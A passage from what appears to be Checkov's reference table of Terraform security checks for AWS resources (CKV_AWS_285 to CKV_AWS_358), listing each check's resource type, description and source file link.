[StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | -| 395 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | -| 396 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 397 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 398 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 399 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 400 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 401 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | 
[IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 402 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 403 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 404 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 405 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 406 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 407 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 408 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 409 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 410 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 411 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 412 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 413 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 414 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 415 | CKV_AWS_289 | resource | 
aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 416 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 417 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 418 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 419 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 420 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 421 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 422 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster 
is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | -| 423 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | -| 424 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | -| 425 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | -| 426 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | -| 427 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | -| 428 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | -| 429 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle 
configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | -| 430 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | -| 431 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | -| 432 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | -| 433 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | -| 434 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | -| 435 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | -| 436 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure 
SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | -| 437 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | -| 438 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | -| 439 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | -| 440 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | -| 441 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | -| 442 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | 
[RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | -| 443 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | -| 444 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | -| 445 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | -| 446 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 447 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 448 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | -| 449 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three 
dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | -| 450 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) | -| 451 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) | -| 452 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) | -| 453 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) | -| 454 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) | -| 455 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) | -| 456 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging 
is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) | -| 457 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) | -| 458 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) | -| 459 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 460 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 461 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 462 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) | -| 463 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | 
[EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) | -| 464 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) | -| 465 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) | -| 466 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) | -| 467 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) | -| 468 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) | -| 469 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) | -| 470 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | 
[SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) | -| 471 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) | -| 472 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) | -| 473 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) | -| 474 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | -| 475 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | -| 476 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 477 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | 
[WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 478 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 479 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 480 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 481 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 482 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) | -| 483 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) | -| 484 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | 
-| 485 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | -| 486 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) | -| 487 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) | -| 488 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) | -| 489 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) | -| 490 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) | -| 491 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | 
[EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) | -| 492 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) | -| 493 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 494 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 495 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 496 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 497 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 498 | CKV_AWS_355 | resource | 
aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 499 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 500 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 501 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 502 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) | -| 503 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) | -| 504 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions 
